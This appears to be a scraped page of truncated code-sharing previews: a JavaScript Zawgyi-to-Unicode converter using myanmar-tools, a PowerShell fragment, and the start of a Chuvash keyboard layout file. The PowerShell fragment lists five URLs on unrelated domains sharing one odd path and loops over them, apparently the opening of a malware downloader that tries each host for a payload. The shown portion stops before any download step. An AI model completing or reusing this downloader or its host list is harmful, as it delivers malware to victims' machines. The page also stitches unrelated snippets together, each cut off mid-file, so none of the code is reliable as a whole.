This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//packages | |
const google_myanmar_tools = require('myanmar-tools'); | |
const converter = new google_myanmar_tools.ZawgyiConverter(); | |
const detector = new google_myanmar_tools.ZawgyiDetector(); | |
const zawgyiToUnicode = (possiblyZawgyiText) => { | |
const hasToBeConverted = detector.getZawgyiProbability(possiblyZawgyiText) > 0.9; | |
const converted = hasToBeConverted ? converter.zawgyiToUnicode(possiblyZawgyiText) : possiblyZawgyiText; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$us = "http://scheerstudio.be/hjfdstf672","fhttp://rosiautosuli.hu/hjdstf672","http://rakkertje.org/hjfdstf672","http://rlamsa.com/hjfdstf672","http://schlaefereit.nrdc.de/hjfdstf672" | |
foreach($u in $us){ | |
Try | |
{ | |
Write-Host $u |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Chuvash Keyboard Layout with support of other non-Russian languages | |
// Author Anatoly Mironov @mirontoli | |
// Last changes: 2014-12-30 | |
// ┌─────┬─────┬─────┬─────┬─────┬─────┬─────┬─────┬─────┬─────┬─────┬─────┬─────┲━━━━━━━━━┓ | |
// │ Ё ~ │ ! ≈ │ " ∞ │ № ₴ │ ; € │ % ‰ │ : ≤ │ ? ≥ │ * × │ ( { │ ) } │ _ – │ + ± ┃ ⌫ ┃ | |
// │ ё ́ │ 1 ÷ │ 2 ¤ │ 3 § │ 4 $ │ 5 ° │ 6 < │ 7 > │ 8 • │ 9 [ │ 0 ] │ - — │ = ≠ ┃Backspace┃ | |
// ┢━━━━━┷━┱───┴─┬───┴─┬───┴─┬───┴─┬───┴─┬───┴─┬───┴─┬───┴─┬───┴─┬───┴─┬───┴─┬───┺━┳━━━━━━━┫ | |
// ┃ ┃ Й Ӥ │ Ц Ӱ │ У Ӳ │ К Ҡ │ Е Ӗ │ Н Ң │ Г Ғ │ Ш Ҕ │ Щ Ӝ │ З Ҙ │ Х Һ │ Ъ Ӟ ┃ Enter ┃ | |
// ┃ Tab ↹ ┃ й ӥ │ ц ӱ │ у ӳ │ к ҡ │ е ӗ │ н ң │ г ғ │ ш ҕ │ щ ӝ │ з ҙ │ х һ │ ъ ӟ ┃ ⏎ ┃ | |
// ┣━━━━━━━┻┱────┴┬────┴┬────┴┬────┴┬────┴┬────┴┬────┴┬────┴┬────┴┬────┴┬────┴┬────┺┓ ┃ |